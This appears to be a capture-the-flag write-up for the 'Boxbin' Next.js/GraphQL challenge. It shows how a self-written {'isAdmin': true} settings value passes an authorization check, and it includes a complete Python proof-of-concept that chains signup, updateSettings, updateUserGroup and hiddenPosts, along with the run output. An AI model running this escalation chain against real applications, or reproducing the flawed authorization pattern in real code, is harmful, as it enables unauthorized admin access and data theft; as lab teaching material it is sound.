📦 Challenge source
📖 Introduction
Boxbin is a Next.js + GraphQL pastebin parody. The core bug is privilege escalation via trusted user-controlled settings in the GraphQL layer. By writing {"isAdmin": true} into our own user.settings, we satisfy the server's isAuthorized() check, then call privileged mutations to join the admin group and read hidden posts (flag).
Context Explanation
- Stack: Next.js API route (Apollo Server) + SQLite.
- Auth: JWT (Authorization header → context.user from DB). Passwords hashed with bcrypt.
- RBAC: Numeric groupId (admin ≤ 1). Several mutations/queries require isAuthorized(context).
- Flaw: isAuthorized() also trusts JSON.parse(user.settings).isAdmin === true, which users can set themselves via updateSettings(settings: String!).
Key entry point (GraphQL handler):
// pages/api/graphql.js
export default startServerAndCreateNextHandler(server, {
  context: async (req) => {
    const token = req.headers.authorization || '';
    if (token) {
      const { userId } = jwt.verify(token, JWT_SECRET);
      const db = await getDb();
      const user = await db.get('SELECT * FROM users WHERE id = ?', userId);
      return { user }; // <-- becomes context.user in resolvers
    }
    return { user: null };
  },
});
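To make the handler's behaviour concrete, here is a minimal Python sketch of the same flow: verify an HS256 token, then re-read the user row on every request. The secret, the table contents (including groupId 5 for a regular user) and the helper names sign_token, verify_token and build_context are assumptions for illustration, not the challenge's code, which calls jwt.verify in Node.

```python
import base64
import hashlib
import hmac
import json
import sqlite3

JWT_SECRET = b"example-secret"  # assumption: the real secret is unknown


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(payload: dict) -> str:
    """Build an HS256 JWT (hypothetical stand-in for the server's signup)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url(json.dumps(payload).encode())
    sig = hmac.new(JWT_SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def verify_token(token: str) -> dict:
    """Check the HS256 signature and return the payload, or raise ValueError."""
    header, body, sig = token.split(".")
    expected = hmac.new(JWT_SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(body))


def build_context(db: sqlite3.Connection, authorization: str) -> dict:
    """Mirror the handler: raw token in, fresh DB row out as context['user']."""
    if not authorization:
        return {"user": None}
    user_id = verify_token(authorization)["userId"]
    row = db.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchone()
    return {"user": dict(row) if row else None}


db = sqlite3.connect(":memory:")
db.row_factory = sqlite3.Row
db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, groupId INTEGER, settings TEXT)")
db.execute("INSERT INTO users VALUES (10, 5, '{}')")
token = sign_token({"userId": 10})

# The same token sees the new settings immediately, because the row is re-read.
before = build_context(db, token)["user"]["settings"]
db.execute("UPDATE users SET settings = ? WHERE id = 10", ('{"isAdmin": true}',))
after = build_context(db, token)["user"]["settings"]
print(before, "->", after)
```

The point of the sketch is that the token only carries userId; everything else in context.user comes from the database at request time, so a settings change takes effect on the very next request without a new login.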
Directive
Abuse the settings-trust + admin-only mutations chain to become admin and query hidden posts containing the flag.
🛠️ Solution
1) Vulnerable authorization logic
// lib/schema.js
function isAuthorized(context) {
  if (context.user && context.user.settings) {
    try {
      const userSettings = JSON.parse(context.user.settings);
      if (userSettings.isAdmin === true) return true; // <-- trusts user-controlled field
    } catch (e) {}
  }
  return (context.user && context.user.groupId <= 1); // fallback: real admin groups
}
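The effect of that check is easiest to see with a few sample users. The following is a Python rendering of the isAuthorized() logic above, written as a sketch; the sample users and the groupId value 5 for a regular account are assumptions, not values from the challenge.

```python
import json


def is_authorized(user):
    """Python rendering of the isAuthorized() logic shown above."""
    if user and user.get("settings"):
        try:
            settings = json.loads(user["settings"])
            # Strict comparison, like `=== true` in the original.
            if isinstance(settings, dict) and settings.get("isAdmin") is True:
                return True  # user-controlled field grants access
        except json.JSONDecodeError:
            pass
    return bool(user) and user["groupId"] <= 1  # fallback: real admin groups


regular = {"id": 10, "groupId": 5, "settings": "{}"}
self_tagged = {"id": 10, "groupId": 5, "settings": '{"isAdmin": true}'}
real_admin = {"id": 1, "groupId": 0, "settings": None}
string_flag = {"id": 11, "groupId": 5, "settings": '{"isAdmin": "true"}'}

for name, user in [("regular", regular), ("self_tagged", self_tagged),
                   ("real_admin", real_admin), ("string_flag", string_flag)]:
    print(name, is_authorized(user))
```

Only the JSON boolean true passes the settings branch; the string "true" does not, which is why the payload must be exactly {"isAdmin": true}.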
2) Attacker-controlled write primitive
Any logged-in user may store arbitrary JSON into their own settings:
// Mutation: updateSettings
updateSettings: async (_, { settings }, context) => {
  if (!context.user) throw new Error('You must be logged in');
  await db.run('UPDATE users SET settings = ? WHERE id = ?', settings, context.user.id);
  return "Settings updated";
}
No schema/shape validation on settings → we can write {"isAdmin": true}.
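For contrast, shape validation on settings could look roughly like the sketch below. The allowlist keys (theme, language) and the function name validate_settings are hypothetical and not taken from the challenge. Validation like this would only narrow the write primitive; the authorization check would still be reading a user-writable field.

```python
import json

# Hypothetical allowlist: key -> expected type. Not taken from the challenge.
ALLOWED_SETTINGS = {"theme": str, "language": str}


def validate_settings(raw: str) -> dict:
    """Parse a settings string and reject unknown keys or wrong value types."""
    try:
        parsed = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise ValueError("settings must be valid JSON") from exc
    if not isinstance(parsed, dict):
        raise ValueError("settings must be a JSON object")
    for key, value in parsed.items():
        expected = ALLOWED_SETTINGS.get(key)
        if expected is None:
            raise ValueError(f"unknown setting: {key}")
        if not isinstance(value, expected):
            raise ValueError(f"wrong type for setting: {key}")
    return parsed


print(validate_settings('{"theme": "dark"}'))
try:
    validate_settings('{"isAdmin": true}')
except ValueError as exc:
    print("rejected:", exc)
```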
3) Privileged mutations gated by isAuthorized
Once isAuthorized(context) returns true, admin-only actions unlock:
// Only allowed if isAuthorized(context) === true
updateUserGroup: async (_, { userId, groupId }, context) => {
  if (!isAuthorized(context)) throw new Error("Forbidden");
  await db.run('UPDATE users SET groupId = ? WHERE id = ?', groupId, userId);
  return db.get('SELECT * FROM users WHERE id = ?', userId);
},
hiddenPosts: async (_, __, context) => {
  if (!isAuthorized(context)) throw new Error("Forbidden");
  return db.all('SELECT * FROM posts WHERE hidden = TRUE ORDER BY id DESC');
}
The app also has an "upgrade" path that changes groupId based on purchased upgrades:
// adminUserUpgrade (no admin required; just logged-in)
adminUserUpgrade: async (_, { upgradeId }, context) => {
  const upgrade = await db.get('SELECT * FROM upgrades WHERE id = ?', upgradeId);
  ...
  await db.run('UPDATE users SET groupId = ? WHERE id = ?', newGroupId, context.user.id);
  return db.get('SELECT * FROM users WHERE id = ?', context.user.id);
}
This step is not required for the exploit, but the PoC runs it before the final escalation.
4) Exploitation flow
(a) Sign up → JWT
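mutation Signup($u:String!, $p:String!) {
  signup(username:$u, password:$p)
}
Use the returned JWT as the value of the Authorization header for the next steps. The handler passes the header value straight to jwt.verify, so send the raw token without a Bearer prefix.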
(b) Buy an upgrade (optional; the PoC runs it before editing settings)
mutation AdminUserUpgrade { adminUserUpgrade(upgradeId: 7) { id groupId } }
(c) Become “authorized” by self-tagging as admin
mutation UpdateSettings($s:String!) {
  updateSettings(settings:$s)
}
# variables: { "s": "{\"isAdmin\": true}" }
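Because settings is a GraphQL String that happens to contain JSON, the payload is JSON-encoded twice on the wire: once to build the settings string and once for the request body. A small sketch of that encoding (no request is sent; the variable name s follows the mutation above):

```python
import json

query = """
mutation UpdateSettings($s: String!) {
  updateSettings(settings: $s)
}"""

# Inner encoding: the settings object becomes a plain string.
settings_value = json.dumps({"isAdmin": True})

# Outer encoding: the whole GraphQL request body, which escapes the inner quotes.
body = json.dumps({"query": query, "variables": {"s": settings_value}})

print(settings_value)
print(body)

# Server side, the string is decoded from the body and later parsed again.
inner = json.loads(json.loads(body)["variables"]["s"])
```

Passing the object directly as the variable, without the inner json.dumps, would not match the String! type declared by the mutation.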
(d) Use unlocked admin mutation to set real admin group
mutation UpdateUserGroup($id:ID!, $g:Int!) {
  updateUserGroup(userId:$id, groupId:$g) { id groupId }
}
# set g = 0 (admin)
(e) Read the hidden content containing the flag
query Hidden { hiddenPosts { content } }
Extract snakeCTF{...} from the returned content.
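The whole chain can also be replayed offline against an in-memory SQLite database. This is a simplified model under stated assumptions: the table layout, the starting groupId of 5, and the placeholder flag are made up for the sketch, and the resolver functions are Python stand-ins for the mutations shown earlier.

```python
import json
import sqlite3

db = sqlite3.connect(":memory:")
db.row_factory = sqlite3.Row
db.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, groupId INTEGER, settings TEXT);
CREATE TABLE posts (id INTEGER PRIMARY KEY, content TEXT, hidden INTEGER);
INSERT INTO users VALUES (10, 5, NULL);                   -- assumed regular user
INSERT INTO posts VALUES (1, 'public paste', 0);
INSERT INTO posts VALUES (2, 'snakeCTF{placeholder}', 1); -- placeholder flag
""")


def load_user(user_id):
    row = db.execute("SELECT * FROM users WHERE id = ?", (user_id,)).fetchone()
    return dict(row)


def is_authorized(user):
    try:
        settings = json.loads(user["settings"] or "null")
        if isinstance(settings, dict) and settings.get("isAdmin") is True:
            return True
    except json.JSONDecodeError:
        pass
    return user["groupId"] <= 1


def update_settings(user_id, settings):
    # Only requires a logged-in user, as in the original mutation.
    db.execute("UPDATE users SET settings = ? WHERE id = ?", (settings, user_id))


def update_user_group(caller_id, user_id, group_id):
    if not is_authorized(load_user(caller_id)):
        raise PermissionError("Forbidden")
    db.execute("UPDATE users SET groupId = ? WHERE id = ?", (group_id, user_id))


def hidden_posts(caller_id):
    if not is_authorized(load_user(caller_id)):
        raise PermissionError("Forbidden")
    rows = db.execute("SELECT content FROM posts WHERE hidden = 1 ORDER BY id DESC")
    return [r["content"] for r in rows]


# Before the exploit: the regular user is rejected.
try:
    hidden_posts(10)
    blocked = False
except PermissionError:
    blocked = True

update_settings(10, json.dumps({"isAdmin": True}))  # step (c)
update_user_group(10, 10, 0)                         # step (d)
flag_posts = hidden_posts(10)                        # step (e)
print(blocked, load_user(10)["groupId"], flag_posts)
```

After step (d) the account is in a real admin group, so access no longer depends on the settings flag.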
PoC
"""
1) signup -> get JWT
2) adminUserUpgrade(upgradeId=7)
3) updateSettings('{"isAdmin": true}')
4) updateUserGroup(userId=<me>, groupId=0)
5) hiddenPosts { content } -> extract snakeCTF{...}
"""
import base64
import json
import re
import secrets
import string
import sys
from typing import Optional, Dict, Any

import requests

# ---------- Config ----------
BASE_URL = "http://localhost:3000/"
GQL_ENDPOINT = BASE_URL.rstrip("/") + "/api/graphql"
USERNAME_PREFIX = "hitcat"
PASSWORD = "Secret123!"
UPGRADE_ID = 7
ADMIN_GROUP_ID = 0
HTTP_TIMEOUT = 20

session = requests.Session()
session.headers.update({"Content-Type": "application/json"})


# ---------- Helpers ----------
def b64url_decode(s: str) -> bytes:
    """Base64URL decode with automatic padding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def jwt_get_user_id(token: str) -> int:
    """Extract userId from the JWT payload without verifying the signature (no secret needed)."""
    try:
        _, payload_b64, _ = token.split(".")
        payload = json.loads(b64url_decode(payload_b64).decode("utf-8"))
        return int(payload["userId"])
    except Exception as exc:
        print(f"[!] Failed to decode JWT userId: {exc}")
        sys.exit(1)


def gql(query: str, variables: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
    """Send a GraphQL request and return the 'data' dict or exit on error."""
    payload = {"query": query, "variables": variables or {}}
    resp = session.post(GQL_ENDPOINT, json=payload, timeout=HTTP_TIMEOUT)
    # Ensure JSON response
    try:
        data = resp.json()
    except Exception:
        print(f"[!] Non-JSON response ({resp.status_code}): {resp.text[:400]}")
        sys.exit(1)
    # Handle GraphQL errors
    if "errors" in data:
        print("[!] GraphQL errors:")
        print(json.dumps(data["errors"], indent=2))
        sys.exit(1)
    return data["data"]


def rand_suffix(n: int = 5) -> str:
    """Random lowercase/digit suffix to avoid username collisions."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


# ---------- Main chain ----------
def main() -> None:
    # 1) SignUp -> JWT in data.signup
    username = f"{USERNAME_PREFIX}{rand_suffix()}"
    print(f"[*] Signing up as: {username}")
    q_signup = """
    mutation Signup($username: String!, $password: String!) {
      signup(username: $username, password: $password)
    }"""
    d = gql(q_signup, {"username": username, "password": PASSWORD})
    token = d["signup"]
    print(f"[+] JWT obtained: {token}")
    # Update session auth header (raw token, as the handler expects)
    session.headers.update({"Authorization": token})
    # Decode userId from JWT
    user_id = jwt_get_user_id(token)
    print(f"[+] Decoded userId from JWT: {user_id}")

    # 2) adminUserUpgrade(upgradeId: 7)
    print("[*] Upgrading user via adminUserUpgrade…")
    q_upgrade = """
    mutation AdminUserUpgrade($upgradeId: ID!) {
      adminUserUpgrade(upgradeId: $upgradeId) { username }
    }"""
    d = gql(q_upgrade, {"upgradeId": UPGRADE_ID})
    print(f"[+] adminUserUpgrade OK for user: {d['adminUserUpgrade']['username']}")

    # 3) updateSettings(settings: "{\"isAdmin\":true}") – string parsed as JSON server-side
    print("[*] Enabling admin via updateSettings…")
    q_settings = """
    mutation UpdateSettings($settings: String!) {
      updateSettings(settings: $settings)
    }"""
    settings_str = json.dumps({"isAdmin": True})  # -> '{"isAdmin": true}'
    d = gql(q_settings, {"settings": settings_str})
    print(f"[+] updateSettings returned: {d['updateSettings']}")

    # 4) updateUserGroup(userId: <me>, groupId: 0)
    print("[*] Switching current user to admin group…")
    q_group = """
    mutation UpdateUserGroup($userId: ID!, $groupId: Int!) {
      updateUserGroup(userId: $userId, groupId: $groupId) {
        id
        groupId
        __typename
      }
    }"""
    d = gql(q_group, {"userId": str(user_id), "groupId": ADMIN_GROUP_ID})
    print(f"[+] updateUserGroup OK -> id={d['updateUserGroup']['id']} groupId={d['updateUserGroup']['groupId']}")

    # 5) hiddenPosts { content } -> extract snakeCTF{...}
    print("[*] Fetching hiddenPosts…")
    q_hidden = """
    query HiddenPosts {
      hiddenPosts {
        content
      }
    }"""
    d = gql(q_hidden)
    posts = d.get("hiddenPosts", [])
    contents = "\n".join(p.get("content", "") for p in posts)
    print(f"[+] Retrieved {len(posts)} hidden posts")

    # Extract the flag
    print("[*] Extracting flag with regex…")
    # Try the backslash-escaped form (snakeCTF\{...\}) first, then the plain form
    matches = re.findall(r"snakeCTF\\{[^}]+\\}", contents)
    if not matches:
        matches = re.findall(r"snakeCTF\{[^}]+\}", contents)
    if matches:
        print(f"[!] FLAG: {matches[0]}")
    else:
        print("[!] Flag not found in hiddenPosts content.")
        print("--- hiddenPosts preview (first 500 chars) ---")
        print(contents[:500])


if __name__ == "__main__":
    main()
Output
[*] Signing up as: hitcatsr4ag
[+] JWT obtained: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEwLCJpYXQiOjE3NTc1MDUyMTh9.85FN-EL3W-kXx7eMPvphbAx00EDF4zcoPJo7g2dDwlo
[+] Decoded userId from JWT: 10
[*] Upgrading user via adminUserUpgrade…
[+] adminUserUpgrade OK for user: hitcatsr4ag
[*] Enabling admin via updateSettings…
[+] updateSettings returned: Settings updated
[*] Switching current user to admin group…
[+] updateUserGroup OK -> id=10 groupId=0
[*] Fetching hiddenPosts…
[+] Retrieved 7 hidden posts
[*] Extracting flag with regex…
[!] FLAG: snakeCTF{f4ke_fl4g_f0r_t3st1ng}